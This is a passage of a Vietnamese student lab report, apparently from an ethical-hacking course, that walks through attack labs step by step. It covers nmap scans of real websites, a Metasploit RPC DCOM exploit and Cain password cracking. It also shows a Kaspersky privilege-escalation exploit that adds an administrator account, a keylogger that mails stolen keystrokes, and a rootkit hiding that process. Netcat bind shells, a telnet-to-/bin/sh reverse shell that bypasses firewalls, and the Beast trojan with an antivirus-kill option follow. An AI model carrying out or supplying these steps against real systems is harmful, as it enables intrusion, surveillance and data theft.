  29. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình20: kiểm tra trên host đó còn sống còn hoạt động. Thử ping tới IP 118. 68. 36. 142 xem Hình21: Kiểm tra một host đã chết Như hình trên host đó đã chết, tuy nhiên Nhưng có thể là không phải thế, có thể là 1 cách nào đó để qua mặt các hacker, như đặt firewall chẳng hạn. Tiếp theo là Ping Sweep. Bản chất của quá trình này là gửi một ICMP Echo Request đến máy chủ mà hacker đang muốn tấn công và mong đợi một ICMP Reply. Nhưng nhiều khi ping tới Trang: 29
  30. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung để xác định vẫn có thể time out. Tại sao vậy? vì hệ thống đó có Firewall đây mà. Một vài tool cho các bạn tiếp tục thử đây: Ping Scanner Pro Fping 2. 17 Utility Ping 2. 1. 2 Pinger 1. 0 FREEping - Server Pinging 2. 0 Network Ping 1. 0. 0. 0 Prestwood Ping Server 1. 1 Ping Test Easy Freeware 2. 04 OstroSoft ICMP Component 1. 0 Tại sao cần kiểm tra host ? Tại sao cần phải kiềm tra các port nào được đóng hay mở đây? Việc xác định các port đang ở trạng thái chạy nhằm mục đích phân tích và xác định các ứng dụng đang chạy của hệ thống và phiên bản của hệ thống. Các cổng dịch vụ đang trong trạng thái chạy có thể cho phép một user không hợp pháp nào đó truy nhập vào hệ thống khi mà hệ thống đó chưa được cấu hình tốt hoặc sử dụng phiên bản phần mềm có độ bảo mật kém. b) Công cụ kiểm tra mạng diện rộng (wan) nmap NMAP -Network exploration tool and security scanner (network mapper) Bạn đi một vòng quanh các website bảo mật thế nào cũng tìm thấy chữ này. Đây là 1 công cụ cực kì quan trọng của hacker cũng như những nhà quản trị mạng trên thế giới. Nmap quan trọng đến nỗi mà trên film ảnh cũng có nó. . Xem 1 ví dụ dưới. Trang: 30
  31. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hinh 22: Phim Matrix có sử dụng phần mềm nmap Nó còn có cả trên phim Battle Royal nữa. Nmap được viết trên mã nguồn mở, là 1 công cụ hữu ích trong việc scan hệ thống mạng diện rộng (WAN) và đặc biệt là hoạt động tốt ở mạng đơn lẻ. Một công cụ đa chức năng. Nmap được sử dụng như một công cụ nhằm kiểm định tính an toàn, bảo mật, có rất nhiều hệ thống và các nhà quản trị mạng tìm đến nó như một thói quen để thao tác như một công cụ thống kê mạng, quản lý các kế hoạch về nâng cấp các dịch vụ. Tính năng nổi bật của Nmap . Nmap giúp bạn xem những dịch vụ nào đang chạy trên server, server đó dùng HDH gì, ping sweep (xem ở trên nha, ICMP Scanning đó). v. v. . Scan được nhiều máy tính trong 1 lần. . Thích hợp cho đa số các HDH. . Xem tất cả các port Thực hành Vào Run gõ cmd, gõ cd\, sau đó gõ nmap www. download. com. Trang: 31
  32. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 23: Kiểm tra các post của một trang web Bây giờ thử thêm -A -PN vào Hình 24: Kiểm tra các post của website bằng lệnh –A -PN Trang: 32
  33. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Trên hình có thể thấy được thông tin về server của công ty Khải Nguyên ; . Hệ điều hành microsoft windows Xp sp2 hoặc server 2003 sp2 . Web server: Microsoft ftpd . CSDL: Microsoft IIS httpd. . Các port được mở và các port bị chặn, bạn có thể xem được port bao nhiêu, dịch vụ giao thức nào đang chạy, chẳng hạn port 21 giao thức FTP được mở c) Dùng Zenmap để kiểm tra trên giao diện Explorer Giới thiệu các bạn 1 tool Nmap xịn hơn, đầy đủ hơn. Đó là Zenmap. Download tại đây. (Ở đây là ver dành cho Window. Nếu bạn dùng hệ điều hành khác vào đây chọn: http: //nmap. org/download. html). Gõ -A -PN www. uitstudent. com như hình dưới Hình25: Kiểm tra một trang web bằng Zenmap Và kết quả như sau: Trang: 33
  34. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 26: Kiểm tra post website bằng Zenmap bằng lệnh –A -PN Hình27: Thông tin dược trả về bằng phần mềm Zenmap Trang: 34
  35. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 28: Số ports/ host được mở và đóng Hình29: Liên kết mạng từ nơi đặt website tới máy đang truy cập Trang: 35
  36. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình29: Dạng xem host đơn giản d) States of port Open: khi scan bạn sẽ bắt gặp trạng thái này, và hầu hết trạng thái này luôn có ở các port 20, 21 (FTP) hay 80 (HTTP) Vì nó được mở nên attacker sẽ tấn công từ đây, và các nhà quản trị, bảo mật cố gắng bảo vệ chúng bằng cách đặt tường lửa nhằm ngăn cản scan tuy nhiên hiện nay có quá nhiều tool scan xuyên qua cả tường lửa. Các port ở trạng thái này thường được quan tâm trong quá trình scan vì bên cạnh đó chúng còn cung cấp các dịch vụ khác được sử dụng trên hệ thống mạng đó. Closed: port ở trạng thái này có thể sử dụng được, nó nhận và trả lời các gói tin thăm dò của Nmap. Tuy nhiên chúng ta sẽ không biết port này đang chạy dịch vụ nào. Các port ổ trạng thái này có thể được mở lại bởi các nhà quản trị. Để bảo vệ chúng có thể đặt firewall, khi đó chúng sẽ có trạng thái filtered. Filtered: Nmap sẽkhộngthể xác định được port nào đang ở trạng thái Open bởi khi bạn sử dụng Nmap gửi các gói tin đến thăm dò thì nó sẽ được lọc, được chặn Trang: 36
  37. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung trước khi tới các port ở trạng thái Filtered này. Cái gì lọc, cái gì chặn nó đây? Firewall đây mà. Những port này có mang lại nhiều thông tin cho attacker hay không, cái đó còn tùy vào sự chuyên nghiệp của attacker đó. Unfiltered: các port ở trạng thái này có thể sử dụng được. nhưng Nmap khộngthể xác định được nó đóng hay mở. Scan các port Unfiltered với các kiểu scan như Windows Scan, SYN Steath cũng có thể giúp giải quyết tìm những port nào được mở. Open/Filtered: Nmap sẽ xác định port ở trạng thái Open/Filtered khi không xác định được port đang ở trạng thái Open hoặc Filtered. Trạng thái này xảy ra với các kiểu scan mà các port ở trạng thái Openkhộng “trả lời “ lại. Việc khộngtrả lời lại cũng có thể do các gói tin đã bị chặn >Filtered. Đó là lí do sao có trạng thái này. Các kiểu scan nhằm hỗ trợ bao gồm UDP Scan, IP Protocol Scan, Null Scan và Xmas Tree Scan. Closed/Filtered: Trạng thái này được sử dụng khi Nmap không biết chắc được port đó đang Closed hay Filtered. Nó được sử dụng cho quét IPID Idle. e) Các kiểu scan trong Nmap Xmas tree scan Xmas Tree:Attacker kiểm tra giao thức TCP bằng cách gửi các gói “Xmas Tree “ đến. Sử durng lệnh nmap -sX ở đây target là www1. khainguyen. Com.vn Trang: 37
  38. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình 30: Attacker kiểm tra giao thức TCP Xem ví dụ dưới: Hình 31: Cách truy cập giữa 2 máy Với ví dụ trên ta có thể thấy được với kiểu Xmas Scan, nếu port mở thì sẽ khộng có sự phản hồi nào nhưng nếu port đóng thì sẽ có sự phản hồi. Nói thêm là ở kiểu này thì máy A sẽ gửi các gói FIN/URG/PSH đến máy đích cần thăm dò (FIN, URG, PSH là gì vui lòng xem ở trên nha). Xmas Scan chỉ làm việc với HDH đầy đủ giao thức TCP/IP hay RFC 793. RFC (Request For Comment) là tập hợp những tài liệu về kiến nghị, đề xuất và những lời Trang: 38
  39. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung bình luận liên quan trực tiếp hoặc gián tiếp đến công nghệ, giao thức mạng INTERNET. Có các RFC cần quan tâm như RFC 768 (UDP Protocol), RFC 791 (IP Protocol), RFC 792 (ICMP Protocol), RFC 793 (TCP Protocol), RFC 826 (Enthernet Protocol), RFC 1034 1035 (Domain Name), RFC 2616 (HTTP 1. 1), RFC 1945 (HTTP 1. 0) Xmas Scan ch làm vic trong môi trng Windows. Với kiểu Scan này có thể xác định gần như là chính xác được port nào đã đóng f) Syn steath/ half open scan Đây là kĩ thuật scan bán mở, tại sao lại gọi như thế, bởi vì nó không hoàn tất cơ chế Three Way Handshake của TCP (xem ở trên). Một attacker gửi một SYN đến đích, nếu một SYN/ACK được nhận trở lại thì nó hoàn tất việc scan và xác địch port đang mở. Xem ví dụ dưới để rõ hơn nha. Hình : Máy A khi muốn thăm dò máy B sẽ gửi gói SYN tới máy B. Và sau đó máy B trả lời bằng gói SYN/ACK. Máy A lại gửi 1 gói RST đến máy B. Ở đây các bạn phải hiểu máy B là máy đích. Nếu máy B được nhận gói RST thì port đó sẽ ở trạng thái đóng. Còn tại sao lại gọi là scan bán mở thì xem trên nha. Quá trình cứ lặp đi lặp lại để chắc chắn rằng port đó đã đóng hay mở. Trang: 39
  40. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung g) Null scan Null Scan cũng giống như kiểu Xmas Tree Scan, chỉ khác là ở kiểu Scan này sẽ không gửi bất cứ gói thăm dò nào nhưng vẫn được trả lại gói SYN/ACK. Để thực hiện kiểu scan này gõ lệnh nmap -sN h) Ack scan Kiểu scan này không tập trung vào bên trong hệ thống, khôngxác định trạng thái port, chỉ thu thập các thông tin về hệ thống xung quanh, bên ngoài firewall. Để thực hiện gõ lệnh nmap –sA. Trang: 40
  41. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung i) Windows scan Kiểu Scan này cũng giống như kiểu ACK Scan nhưng với kiểu này ta có thể xác định được port nào được mở. Để thực hiện gõ lệnh nmap -sW j) Fin scan Trang: 41
  42. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Fin Scan cũng giống như kiểu Xmas Scan, nhưng ở đây các gói FIN sẽ được gửi đi thăm dò, nếu khộng có sự phản hồi nào lại thì port đó đã mở, và ngược lại nếu có sự trả lời bằng gói RST/ACK thì port đó ở trạng thái Closed. Thực nghiệm: Sử dụng phần mềm Retina để phát hiện các vulnerabilities và tấn công bằng Metaesploit framework. Retina của Ieye là phần mềm thương mại(cũng như GFI, shadow v.v ) có thể update các lỗ hỗng 1 cách thường xuyên và giúp cho người Admin hệ thống có thể đưa ra những giải pháp để xử lý. Bây giờ ta sử dụng phần mềm Retina để dò tìm lỗi của máy Win 2003 Sp0(10.100.100.6) Trang: 42
  43. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Report từ chương trình Retina: 20 lỗ hổng quan tọng trong bảo mật Ra Vulnerability Name Count nk 1. echo service 1 2. ASN.1 Vulnerability Could Allow Code Execution 1 3. Windows Cumulative Patch 835732 Remote 1 4. Null Session 1 5. No Remote Registry Access Available 1 6. telnet service 1 7. DCOM Enabled 1 8. Windows RPC Cumulative Patch 828741 Remote 1 9. Windows RPC DCOM interface buffer overflow 1 10. Windows RPC DCOM multiple vulnerabilities 1 11. Apache 1.3.27 0x1A Character Logging DoS 1 12. Apache 1.3.27 HTDigest Command Execution 1 13. Apache mod_alias and mod_rewrite Buffer 1 14. OverflowApacheBench multiple buffer overflows 1 15. HTTP TRACE method supported 1 Trang: 43
  44. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung 20 port mở quan trọng và thông dụng trong mạng. Ran Port Description Count 1. TCP:7 ECHO - Echo 1 2. TCP:9 DISCARD - Discard 1 3. TCP:13 DAYTIME - Daytime 1 4. TCP:17 QOTD - Quote of the Day 1 5. TCP:19 CHARGEN - Character Generator 1 6. TCP:23 TELNET - Telnet 1 7. TCP:42 NAMESERVER / WINS - Host Name Server 1 8. TCP:53 DOMAIN - Domain Name Server 1 WWW-HTTP - World Wide Web HTTP (Hyper Text 1 9. TCP:80 Transfer Protocol) RPC-LOCATOR - RPC (Remote Procedure Call) 10. TCP:135 Location Service 1 11. TCP:139 NETBIOS-SSN - NETBIOS Session Service 1 12. TCP:445 MICROSOFT-DS - Microsoft-DS 1 13. TCP:1025 LISTEN - listen 1 14. TCP:1026 NTERM - nterm 1 15. TCP:1030 IAD1 - BBN IAD 1 16. TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1 17. TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1 18. TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 19. TCP:8080 Generic - Shared service port 1 20. UDP:7 ECHO - Echo 1 Rank Operating System Name Count 1. Windows Server 2003 1 Như vậy ta đã xác định hệ điều hành của máy 10.100.100.6, cácPort mở của hệ thống.và các lỗi của hệ thống. Đây là thông tin cần thiết để người Admin nhận diện Trang: 44
  45. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung lỗi và vá lỗi Trong Top 20 vulnerabilities ta sẽ khai thác bug lỗi thứ 10 là RPC DCOM bằng chương trinh Metaesploit framework(CD CEH v5). Ta có thể kiểm tra các thông tin lỗi này trên chính trang của Ieye hay securityfocus.com, microsoft.com Ta sử dụng giao diện console của Metaesploit để tìm bug lỗi hợp với chương trình Retina vừa quét được: Hình giao diện chương trình Metaesploit Ta thấy có thể nhận thấy bug lỗi msrpc_dcom_ms03_026.pm được liệt kê trong phần exploit của metaesploit. Bây giờ ta bắt đầu khai thác lỗi này. Trang: 45
  46. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Kết luận: Phần mềm scanning rất quan trọng với Hacker để có thể phát hiện lỗi của hệ thống, sau khi xác định lỗi Hacker có thể sử dụng Framework có sẵn hay code có sẵn trên Internet để có thể chiếm quyền sử dụng của máy mục tiêu. Tuy nhiên đây cũng là công cụ hữu ích của Admin hệ thống, phần mềm này giúp cho người Admin hệ thống đánh giá lại mức độ bảo mật của hệ thống mình và kiểm tra liên tục các bug lỗi xảy ra. 6 SYSTEM HACKING 6.1) Giới thiệu System Hacking: Như chúng ta đã học ở phần lý thuyết, Module System Hacking bao gồm những kỹ thuật lấy Username và Password, nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin của đối phương(trong bước này cũng có thể Hacker để lại Trojan, vấn đề học ở chương tiếp theo), ẩn thông tin của process đang hoạt động(Rootkit), và xóa những log hệ thống. Đối với phần lấy thông tin về username và password Local, hacker có thể crack pass trên máy nội bộ nếu sử dụng phần mềm cài lên máy đó, hay sử dụng CD boot Knoppix để lấy syskey, bước tiếp theo là giải mã SAM để lấy hash của Account hệ thống. Chúng ta có thể lấy username và password thông qua remote như SMB, NTLM(bằng kỹ thuật sniffer sẽ học ở chương sau) hay thông qua 1 Account đã của hệ thống đã biết(sử dụng PWdump3) Với phần nâng quyền trong hệ thống, Hacker có thể sử dụng lỗ hỗng của Window, các phần mềm chạy trên hệ thống nhằm lấy quyền Admin điều khiển hệ thống. Trong bài thực hành ta khai thác lỗ hổng của Kaberky Lab 6.0 để nâng quyền từ user bình thường sang user Administrator trong Win XP sp2. Phần Keylogger ta sử dụng SC-keyloger để xem các hoạt động của nạn nhân như giám sát nội dung bàn phím, thông tin về chat, thông tin về sử dụng máy, thông tin về các tài khoản user sử dụng. Trang: 46
  47. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung phát hiện ra là mình đang bị theo dõi. Ở bước này ta sử dụng vanquis rootkit để ẩn các Tiếp theo ta sử dụng Rootkit để ẩn các process của keyloger, làm cho người admin hệ thống không thể process trong hệ thống. Cuối cùng ta xóa log và dấu vết xâm nhập hệ thống. 6.2) Thực hành các bài Lab về System Hacking a) Bài 1: Crack password nột bộ nội bộ Trước tiên ta cài phầm mềm Cain vào máy đối phương, và sử dụng phần mềm này để dò tìm password của user. Hình Quá trình tạo một account bằng consonle Bật phần mềm Cain và chọn Import Hashes from local system Trang: 47
  48. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình giao diện thêm thông tin của account Ở đây chúng ta thấy có 3 chế độ, “ Import hash from local system”, ta sử dụng file SAM của hệ thống hiện tại để lấy hash của account(không có mã hóa syskey), Option Import Hashes from text file, thông thường text file này là lấy từ Pwdump(lưu hash của account hệ thống dưới dạng không bị mã hóa), Option thứ 3 là khi chúng ta có syskey và file SAM bị mã hóa bởi syskey. Ca ba trường hợp nếu nhập đầy đủ thông tin chúng ta đều có thể có hash của account không bị mã hóa bởi syskey. Dựa vào thông tin hash này phân mềm sẽ brute force để tìm kiếm password của account. Trong bài ta chọn user haovsic, và chọn Brute force theo NTLM hash. Sau khi chọn chế độ này ta thấy PC bắt đầu tính toán và cho ra kết quả. Trang: 48
  49. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình các quyền sử dụng được liệt kê trên phần mềm Cain Trang: 49
  50. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình mật khâu đã được tìm thấy b) Bài Lab 2: Nâng quyền thông qua chương trình Kaspersky Lab Đối với việc nâng quyền trong một hệ thống hacker phải lợi dụng lổ hổng nào đó, hoặc là từ hệ điều hành, hoặc là từ những phần mềm của hãng thứ 3, trong trường hợp này, chúng ta nâng quyền thông qua phần mềm diệt Virus là Kaspersky Lab. Để chuẩn bị bài lab này, chúng ta lên trang web www.milw0rm.com để tìm thông tin về đoạn mã khai thác này. Trang: 50
  51. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình trang tìm kiếm milworm Sau đó ta sử dụng đoạn code này biên dịch thày file exe để tấn công vào máy này nhân. Để thực hành bài Lab, ta cần phải cài phần mềm Kaspersky vào máy. Sau khi cài xong ta thêm vào máy 1 user bình thường,và tiến hành log on vào user này, Trong bài ta sử dụng user thach và password là 12345. Trang: 51
  52. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình tạo một quyền truy cập mới trong của sổ console Chạy file exe đã được biên dịch để exploit vào Kaspersky đang chạy dưới quyền admin hệ thống. Trang: 52
  53. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Sử dụng lệnh “ telnet 127.0.0.1 8080 “ để truy xuất vào shell có quyền admin hệ thống. Ta tiếp tục sử dụng lệnh “Net Localgroup administrators thach /add” để add user “ thach”, vào nhóm admin, và sử dụng lệnh net user để tái xác nhận. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. D:\WINDOWS\system32> D:\WINDOWS\system32>net Localgroup administrators thach /add net Localgroup administrators thach /add The command completed successfully. D:\WINDOWS\system32>net user thach net user thach User name thach Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password last set 8/3/2007 1:47 PM Password expires 9/15/2007 12:35 PM Password changeable 8/3/2007 1:47 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 8/3/2007 1:54 PM Logon hours allowed All Trang: 53
  54. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully. D:\WINDOWS\system32> Ta thấy user “ thach” bây giờ đã có quyền Admin trong hệ thống, và việc nâng quyền đã thành công. Các bạn có thể test những phần mềm tường tự từ code down từ trang www.milw0rm.com. c) Bài Lab 4: Sử dụng Keylogger Trong bài lab này, ta sử dụng phần mềm SC Keylogger để thu thập thông tin từ máy của nạn nhân, việc phải làm phải tạo ra file keylog, chọn mail server relay, cài vào nạn nhân. Sau khi cài phần mềm tại file keylogger, bây giờ ta bắt đầu cấu hình cho “sản phẩm” keylogger của mình. Đầu tiên ta chọn hành động được ghi log file bao gồm ghi keyboard, Mouse, và chương trình chạy. Trang: 54
  55. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình giao diện tạo keylog của phần mềm Sc keylog Hình giao diên chứng thực của Sc keylog Tiếp theo ta chọn thông tin email mà máy nạn nhân sẽ gởi logfile này. Thông tin này được gởi 10 phút 1 lần Trang: 55
  56. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Hình thiết lập cấu hình trước khi gởi keylog đi Tiếp theo ta cấu hình mail server để relay, và thông tin về process hiển thị, ở phần này. hacker thông thường sử dụng những tên giống với những service có sẵn trên Window như svchost. exe, csrss.exe.v.v để đánh lừa người admin. Để dễ nhận dạng ta chọn tên file là cehkeyloger Trang: 56
  57. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Trang: 57
  58. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Sau khi tạo xong keylogger, ta chạy nó trên máy nạn nhân. Ta chọn 1 máy Win XP nào đó để chạy chương trình này và giả sử sau đó đánh đoạn text sau: Đợi khoảng 10 phút ta sẽ thấy logfile được gởi về như sau: Trang: 58
  59. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung >> C:\WINDOWS\system32\notepad.exe > Toi oi Sec CEH manh dung tuyet vong > Chuc cac ban dau tot nghiep > > ms > C:\WINDOWS\system32\mspaint.exe Theo như trên, chúng ta có thể thấy keyloger có thể lưu lại hầu như hết tất cả thông tin trên PC của máy nạn nhân, đặc biệt là các thông tin nhạy cảm như thẻ tín dụng, account, v.v. Người viết khuyến cáo các bạn sử dụng kiến thức với mục đích nghiên cứu, không sử dụng chương trình này với mục đích xấu. d) Bài Lab 5: Sử dụng Rootkit và xóa Log file Rootkit là chương trình làm ẩn sự hoạt động của keylogger, trojan, làm cho admin hệ thộng khó khăn trong việc phát hiện. Trong bài thực hành ta sử dụng Fu Rootkit để ẩn process của keylogger ta đã cài ở bài trước, ta sử dụng lệnh “tasklist” để xem các process chạy trong máy tính. Trang: 59
  60. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Như ta thấy trên hình, proccess của cehkeyloger.exe có PID là 1236, bây giờ ta sẽ lẩn process này bằng lệnh “ fu –ph 1236” và thử xem lại các process bằng lệnh “ tasklist”. Ta thấy keylogger đã biến mất khỏi tasklist, lúc này muốn detect được chính xác người admin nên sử dụng trương trình antivirus, kiểm soát truy nhập và chạy những chương trình kiểm tra rootkit trong máy như rootkit detector. Trang: 60
  61. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung 7 TROJAN và BACKDOOR 7.1) Giới thiệu về Trojan và Backdoor: Trojan và Backdoor được sử dụng giám sát máy nạn nhân, và là cửa sau để Hacker có thể vào lại hệ thông máy tính thông qua công kết nối(port), thông qua môi trường Web(webase). Loại sử dụng cổng kết nối ta thường thấy là netcat, beast, Donald Dick v.v. Và loại sử dụng môi trường Webbase thông thường là r57,c99, zehir4v.v. Đặc tính của Trojan kết nối port là mỗi lần kết nối phải mở cộng, và admin tương đối phát hiện dễ dàng hơn so với loại Webbase(thông thường để tấn công Web Server). Trong bài thực hành, chúng ta cài thử các tính năng của netcat, beast, c99, zehir4 và phân tích 1 doạn code mẫu trojan. 7.2) Các bài thựchành: a) Bài 1 Sử dụng netcat: . Sử dụng netcat để kết nối shell Trang: 61
  62. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l (listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe (đối với NT) hoặc bin/sh (đối với Unix). E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error. E:\>nc -nvv -l -p 8080 –e cmd.exe listening on [any] 8080 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080 Trang: 62
  63. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung C:\>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] © Copyright 1985-1999 Microsoft Corp E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test [.] [ ] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C:\test>exit exit sent 20, rcvd 450: NOTSOCK Bây giờ chúng ta đã có được shell và kiểm soat được máy nạn nhân.Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũngđóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thaycho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux. . Sử dụng netcat để kết nối shell nghịch chuyển để by pass Firewall: Dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia Ví dụ: Trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25: Trang: 63
  64. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung + cửa sổ Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 connect to [172.16.84.1] from [172.16.84.2] 1055 pwd ls -la + cửa sổ Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056/ total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15 . drwxr-xr-x 17 root root 4096 Feb 5 16:15 drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (²?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (²?b drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²? drwx 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (²?n drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var Trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất: Trang: 64
  65. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 172.16.84.1 Connected to 172.16.84.1. Escape character is '^]' Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2). Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc. b) Bài 2: Sử dụng Trojan Beast và detect trojan Muốn sử dụng Trojan Beast, ta cần phải xây dụng 1 file Server cài lên máy nạn nhân, sau đó file server này sẽ lắng nghe ở những port cố định và từ máy tấn công ta sẽ connect vào máy nạn nhân thông qua cổng này. Chọn chương trình trojan Beast và chạy file tạo trojan Trang: 65
  66. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Ta có thể sử dụng thêm các tính năng như AV-FW kill để tắ Firewall trên máy đối phương, hoặc inject vào 1 file khác như notepad.exe, explore dưới dạng dll. Ta sử dụng button Save Server để tại ra file server.exe và chạy file ở máy nạn nhân và kiểm tra trên taskmanager của máy nạn nhân xem Trojan đã thực sự hoạt động Bây giờ ta sử dụng chương trình tại máy tấn công để connect vào file Server đã chạy trên máy của nạn nhân. Trang: 66
  67. GVHD: Ths.Nguyễn Minh Thi SVTH: Vũ ngọc Thạch SVTH:Lê Quốc Tung Ta thử sử dụng 1 số tính năng như là managers file để download các file mình cần tại máy nạn nhân, hay bạn có shutdown, reboot máy nạn nhân thông qua tính năng của tag“Windows” Trang: 67
